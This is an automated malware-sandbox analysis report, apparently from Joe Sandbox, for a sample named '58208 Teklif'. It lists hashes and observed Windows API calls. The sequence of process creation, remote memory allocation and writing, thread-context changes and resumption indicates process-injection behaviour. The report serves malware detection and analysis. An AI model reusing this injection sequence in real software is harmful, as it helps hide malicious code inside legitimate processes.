                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23618efc4fee4f0100aea34aa22c0c85d41e3655a52a95219d72e6ab79134c1a
                                                      • Instruction ID: d1ee6b7d1b1c1a1392cbb5fead6cfd2e236603df567675efaa90f970c5c95a0f
                                                      • Opcode Fuzzy Hash: 23618efc4fee4f0100aea34aa22c0c85d41e3655a52a95219d72e6ab79134c1a
                                                      • Instruction Fuzzy Hash: 0F2103B0D116198BEB18CFABD8447EEFAF6AFC9300F04C07A940866264DB74094ACF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D37E
                                                      • GetCurrentThread.KERNEL32 ref: 0155D3BB
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D3F8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0155D451
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: e50a834ae59ec7039ef24727be9f6ef4597678e938207bdd69307b3b5e659188
                                                      • Instruction ID: 9009b4f6a3edfae708bb8b8c9e98887aa863edeef31c37e0ecf2a893c6a8ca52
                                                      • Opcode Fuzzy Hash: e50a834ae59ec7039ef24727be9f6ef4597678e938207bdd69307b3b5e659188
                                                      • Instruction Fuzzy Hash: 1A5154B19002498FEB54CFA9D548BEEBFF1FB88304F20845AE519BB260D7745948CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D37E
                                                      • GetCurrentThread.KERNEL32 ref: 0155D3BB
                                                      • GetCurrentProcess.KERNEL32 ref: 0155D3F8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0155D451
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 53bee977fe0c4f00b8e94463ea46a6592a7e3734e00c17aa626ee2aaadf8255f
                                                      • Instruction ID: 7993c9c93ba701789fa59cbc51108b6e8d70cb4f1cdaf10e0eb863079ee6ee80
                                                      • Opcode Fuzzy Hash: 53bee977fe0c4f00b8e94463ea46a6592a7e3734e00c17aa626ee2aaadf8255f
                                                      • Instruction Fuzzy Hash: 255144B09002499FEB58DFAAD548B9EBFF1BF88304F20841AE519B7260D7746948CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779601E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: f671a1a22a177d8ba1e91a8dfbf779619f192b8427c2815e3621ec5e75aee7e3
                                                      • Instruction ID: a9765c21e28caf04d237967e083bcabc11a65392797c07c6e12925e640db013c
                                                      • Opcode Fuzzy Hash: f671a1a22a177d8ba1e91a8dfbf779619f192b8427c2815e3621ec5e75aee7e3
                                                      • Instruction Fuzzy Hash: 0FA18CB0D0122ACFDF11CF68D881BEDBBB2BF44354F04856AE808A7280DB759985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779601E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 478693ca9c4855fd20ccf2f5e71c3f5cbda2f4f53f3ac71291530ce9ee46e90a
                                                      • Instruction ID: 2ec664e51a52eb3da46cab7c44e0f8e2b44ca1ece36042c87bf6a3afc5498bed
                                                      • Opcode Fuzzy Hash: 478693ca9c4855fd20ccf2f5e71c3f5cbda2f4f53f3ac71291530ce9ee46e90a
                                                      • Instruction Fuzzy Hash: 45918DB0D0122ACFDF11CF68D881BEDBBB2BF44314F04856AE809A7280DB759995CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0155B2BE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 424f0045f7379a2ac1fe33d296c52a511e513e79979c144df9bd2e2fa473746a
                                                      • Instruction ID: 3d1627a459ad074aaae1dfd7b908c16a1f1e3f38480d4c89de22487ad40e6cdc
                                                      • Opcode Fuzzy Hash: 424f0045f7379a2ac1fe33d296c52a511e513e79979c144df9bd2e2fa473746a
                                                      • Instruction Fuzzy Hash: 47714570A00B058FD7A4DF6AD45475ABBF2FF88300F108A2ED84ADBA50D775E949CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015559C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: bea9ea4389d8e00f245d6a27e1ab8839e15c31d6a131e0886d952dc6ac31677d
                                                      • Instruction ID: ede9316e83ac489cfe8819de06dc06e3c8c2eb38adab427e2dedaecf5c30ba36
                                                      • Opcode Fuzzy Hash: bea9ea4389d8e00f245d6a27e1ab8839e15c31d6a131e0886d952dc6ac31677d
                                                      • Instruction Fuzzy Hash: CA41F1B0C00719CFDB24CFAAC894B8DBBF5BF49304F60816AD408AB255EB756949CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015559C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 6724a220a71cecb18f35a829a66db54ed95581b3bf12f34cf1e886bd1e565c5a
                                                      • Instruction ID: 89ec5fa19e49e61562b4e713ad9edc0f7ea54d3421464f9b53bd7d9c038d376e
                                                      • Opcode Fuzzy Hash: 6724a220a71cecb18f35a829a66db54ed95581b3bf12f34cf1e886bd1e565c5a
                                                      • Instruction Fuzzy Hash: C54102B0C0071DCBDB24CFAAC894B9DBBF5BF49304F60806AD508AB255EB756949CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07795BF0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 9ec9527f8d508ca8c91a6099d484c090162ac66ef76e0f73311ebb42ddf7f4c9
                                                      • Instruction ID: 908c5ccb1941d2b2205043fb9afa4573f8f64f64342aef241c641ac7eeeb14e2
                                                      • Opcode Fuzzy Hash: 9ec9527f8d508ca8c91a6099d484c090162ac66ef76e0f73311ebb42ddf7f4c9
                                                      • Instruction Fuzzy Hash: FD2123B5D003199FCF10CFA9D9857EEBBF0FB48310F10882AE919A7250C7799955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D5CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 7232d8f0d58cbba24dd989bee4c715b3e6115c239dca2066e59168b172c016b0
                                                      • Instruction ID: af0e0cc9fb1c819daeff0a7db95bd728f6d24801d8e867e49884e7a2543c65a3
                                                      • Opcode Fuzzy Hash: 7232d8f0d58cbba24dd989bee4c715b3e6115c239dca2066e59168b172c016b0
                                                      • Instruction Fuzzy Hash: CF3139B58002499FDB11CFA9D584ADEBFF4FF49324F14815AE958A7350C375A941CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07795BF0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 320105237739d29c2265ff03bf7dc023d86fbb3b68205455a14561aa952a8fc9
                                                      • Instruction ID: 73392f1a595d4dfcb386aa9f25223ccfd019896603ef102446de544f74ebe5ec
                                                      • Opcode Fuzzy Hash: 320105237739d29c2265ff03bf7dc023d86fbb3b68205455a14561aa952a8fc9
                                                      • Instruction Fuzzy Hash: 8A2125B19003599FCF10DFA9D885BEEBBF5FF48310F50882AE919A7240C7799954CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07795CD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a607ae9690a45ed9dc2d2d9b21f3f06ee6482626374fb46664acb6e0e2474665
                                                      • Instruction ID: da58bef2017fb5f4a9704e1d2b7b743e1295c4596abdad4846b487e909bbf6a4
                                                      • Opcode Fuzzy Hash: a607ae9690a45ed9dc2d2d9b21f3f06ee6482626374fb46664acb6e0e2474665
                                                      • Instruction Fuzzy Hash: 8C2136B1D003199FCB10DFA9D9816EEBBF4FF48314F10842AE919A7240C7359945DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07795CD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 96f8f66c27689153d1e577626ba2b90bea18f9c6abc2088a1f97bbefc110dbbc
                                                      • Instruction ID: 1dc3f1065d6d626a94f6e7f6ff396c70319bf49b04b18ef58bab8b72a8d1fd03
                                                      • Opcode Fuzzy Hash: 96f8f66c27689153d1e577626ba2b90bea18f9c6abc2088a1f97bbefc110dbbc
                                                      • Instruction Fuzzy Hash: 862145B1C003199FCB10DFAAD881AEEFBF4FF48310F50842AE919A7240C7399944CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07795A46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 9c1e0825a7398f95713d985c533c90cc9ed31e5839cc7926e396698aed8792bb
                                                      • Instruction ID: 43bc751c2d2bc995b8539435a400b9254d277fd8d048bcab74eade629245e318
                                                      • Opcode Fuzzy Hash: 9c1e0825a7398f95713d985c533c90cc9ed31e5839cc7926e396698aed8792bb
                                                      • Instruction Fuzzy Hash: 6A2134B1D002198FDB10DFAAD485BEEBFF4EB48324F50842AD519A7241CB78A945CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D5CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 46193974b066bde319982b13f8d8d6577be162ebd11a91d49ab3db5fc4a3a6ef
                                                      • Instruction ID: 70909218702455a4b8c5776719d53810687be942201829e600833f4f5e7d0ccd
                                                      • Opcode Fuzzy Hash: 46193974b066bde319982b13f8d8d6577be162ebd11a91d49ab3db5fc4a3a6ef
                                                      • Instruction Fuzzy Hash: 7021C2B5900248AFDB10DFAAD984ADEBFF8FB48314F14841AE918A7350D375A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07795A46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: fe8a6bb261a17027e11dbd020da5a6d6fca96bcccf8a141c14ee0dfa5ff3c178
                                                      • Instruction ID: e3d79de750a93b4c4c97432cb9d0f6726c605a810c25671a7773b8d0c6a45ef5
                                                      • Opcode Fuzzy Hash: fe8a6bb261a17027e11dbd020da5a6d6fca96bcccf8a141c14ee0dfa5ff3c178
                                                      • Instruction Fuzzy Hash: 7D2133B1D002198FDB10DFAAD5857EEBBF4EF48324F14842AD519B7281CB789945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07795B0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: abe2fe3a9106d998ef1498577446ffc07967f1e607419b9743127671d69b2abe
                                                      • Instruction ID: 1a3e0809d00d549b95bcb6013e099e66c5e87a0145798c2b3eb72e0338c66859
                                                      • Opcode Fuzzy Hash: abe2fe3a9106d998ef1498577446ffc07967f1e607419b9743127671d69b2abe
                                                      • Instruction Fuzzy Hash: 251164B6D002089FCB11CFA9C945AEEBFF5EF48324F20881AD519A7250C7369905CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0155B339,00000800,00000000,00000000), ref: 0155B54A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 34201943c7d26ee967bffde703953349f45b8bc57cc20396d3a2f5dd7eec1027
                                                      • Instruction ID: 35a393eb42b8d5dd199600ca51ca312634628dead7e8c288c3bf3aee99555abf
                                                      • Opcode Fuzzy Hash: 34201943c7d26ee967bffde703953349f45b8bc57cc20396d3a2f5dd7eec1027
                                                      • Instruction Fuzzy Hash: B61114B69003089FDB24CF9AD448AAEFBF5FB48314F14842ED919BB200D375A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0155B339,00000800,00000000,00000000), ref: 0155B54A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: ff168b139385d025edea763af2e49c24e9abe9b55539b0524e5c2caca036c17a
                                                      • Instruction ID: 39fff693fdb045158cf83f7d4ff9143e46c9d36e657a014f6370730179f878fe
                                                      • Opcode Fuzzy Hash: ff168b139385d025edea763af2e49c24e9abe9b55539b0524e5c2caca036c17a
                                                      • Instruction Fuzzy Hash: C11103B69002089FDB24CFAAD488AEEFBF5BB88314F14841AD919B7200C375A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07795B0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 967bb38edec76b49dda6ecd3cc3b9032b46d1c7c9caa88af52d9dc7dbc935eac
                                                      • Instruction ID: 4ad5ef22b9e1aee98f4d13c060a369850624ce1691213310cc81a167dcda3517
                                                      • Opcode Fuzzy Hash: 967bb38edec76b49dda6ecd3cc3b9032b46d1c7c9caa88af52d9dc7dbc935eac
                                                      • Instruction Fuzzy Hash: 241167B19002499FCF10DFAAD845ADEBFF5EF48320F108819E519A7250C776A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 071a6c9600f5fc6c0c8d361e5bb376717e189d90f1ec87c0087a1a6b6d7a65c0
                                                      • Instruction ID: acb58037abf1cb16f5dedf49c2ee759fb35749495185b34d18ca9e98e05a8d94
                                                      • Opcode Fuzzy Hash: 071a6c9600f5fc6c0c8d361e5bb376717e189d90f1ec87c0087a1a6b6d7a65c0
                                                      • Instruction Fuzzy Hash: 92116AB1D003488FCB20DFAAD4457DEFBF5AB88324F208429D519A7240C775A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0779811D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: ab90fbce08fc2224c6dc5b89e4f0cb2509d7a020be30aab16707f93dec496015
                                                      • Instruction ID: db91892ecb24bd7a780d4a1db24ea4797e0d621c45bfcacd29a03c5d123adba0
                                                      • Opcode Fuzzy Hash: ab90fbce08fc2224c6dc5b89e4f0cb2509d7a020be30aab16707f93dec496015
                                                      • Instruction Fuzzy Hash: 7411F2B5800349DFDB10DF9AD849BDEBBF8EB49310F10881AE919B7200D375A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 2cf861d71768e53d0e15ea76845fbfef2d65d7cb2d8ed811bd7dea2b65087b15
                                                      • Instruction ID: b463506a094cc7f9759b8d7b811b0a99d217c645e16b3a0dd68df0c6c5b82abd
                                                      • Opcode Fuzzy Hash: 2cf861d71768e53d0e15ea76845fbfef2d65d7cb2d8ed811bd7dea2b65087b15
                                                      • Instruction Fuzzy Hash: 891166B1D002488ECB20DFA9D5457EEFBF5AF48324F20882AD519B7240C735A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 077991F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 3e907ab6d258d58182f59ba35174cc452829d2bc99e542255f22df03751562ac
                                                      • Instruction ID: 9fa4b2687eeb518846b672f260f0ff06aa87c464e61d42d1b15dc4bd8070ee89
                                                      • Opcode Fuzzy Hash: 3e907ab6d258d58182f59ba35174cc452829d2bc99e542255f22df03751562ac
                                                      • Instruction Fuzzy Hash: 951145B5800349CFDB10DF9AD549BDEBBF4EB48320F11842AD919A7340D339A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 077991F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 6cfc4660c4f10e2afeb93f4f13b182495fe2aa5ed158874f1de62cbc7d0327e1
                                                      • Instruction ID: d42823c6e5eb300c8a4844c683751672c1eb95b40c038b9bbb77c267710bca60
                                                      • Opcode Fuzzy Hash: 6cfc4660c4f10e2afeb93f4f13b182495fe2aa5ed158874f1de62cbc7d0327e1
                                                      • Instruction Fuzzy Hash: 651133B6800349CFDB10DF99D549BDEBBF4FB48320F11882AD969A7240D339A644CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0155B2BE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1318711187.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1550000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 823a65fd87379b91d4985e2c93b5217bf8501ef1186d4e7f2654e8fa2e23281f
                                                      • Instruction ID: 7a89138d036a705bcd334dd62b7e658980d91baef8616919fbfb6b889c8416e3
                                                      • Opcode Fuzzy Hash: 823a65fd87379b91d4985e2c93b5217bf8501ef1186d4e7f2654e8fa2e23281f
                                                      • Instruction Fuzzy Hash: 581110B5C003498FDB10CF9AD448ADEFBF5AF88314F11841AD929BB600C375A545CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0779811D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 8e3440e0e5ea7087677c316adaea71b9ce794ba85d940e9e00c127917f6cafb1
                                                      • Instruction ID: a3aeeeb7c1bcc6e910e237c0ec4d76bf2971740da2119ac623bc72a8fb82d5f2
                                                      • Opcode Fuzzy Hash: 8e3440e0e5ea7087677c316adaea71b9ce794ba85d940e9e00c127917f6cafb1
                                                      • Instruction Fuzzy Hash: 9C11B0B58002499FDB10DF99D949BDEBBF4AB48310F25881AD519A7600D375A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MSM!
                                                      • API String ID: 0-796847619
                                                      • Opcode ID: c3370d198c972a68f55f5c5941a4800c5188510de977e1ef670e2ebbd075d62e
                                                      • Instruction ID: 9513ffa68b2075e3e7ce9a405d3a9593e49f3fe0f19705923b684710c76d193c
                                                      • Opcode Fuzzy Hash: c3370d198c972a68f55f5c5941a4800c5188510de977e1ef670e2ebbd075d62e
                                                      • Instruction Fuzzy Hash: FBE119B4E012198FCB14CFA9D5909AEFBB2FF89304F248169D815AB395D734AD41CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7790000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MSM!
                                                      • API String ID: 0-796847619
                                                      • Opcode ID: 28a289b57e05e2c9cc573b4adc401acd9f5cc303915bfb684742a2e06b0c53f0
                                                      • Instruction ID: af3895aeac6557f91371ee5181466aef3e044926a3caff85949e620de833fb2f
                                                      • Opcode Fuzzy Hash: 28a289b57e05e2c9cc573b4adc401acd9f5cc303915bfb684742a2e06b0c53f0
                                                      • Instruction Fuzzy Hash: 205119B4E112198FCB14CFA9D5905AEBBF2FF89304F24C169D418AB356D7309A42CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1322377942.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
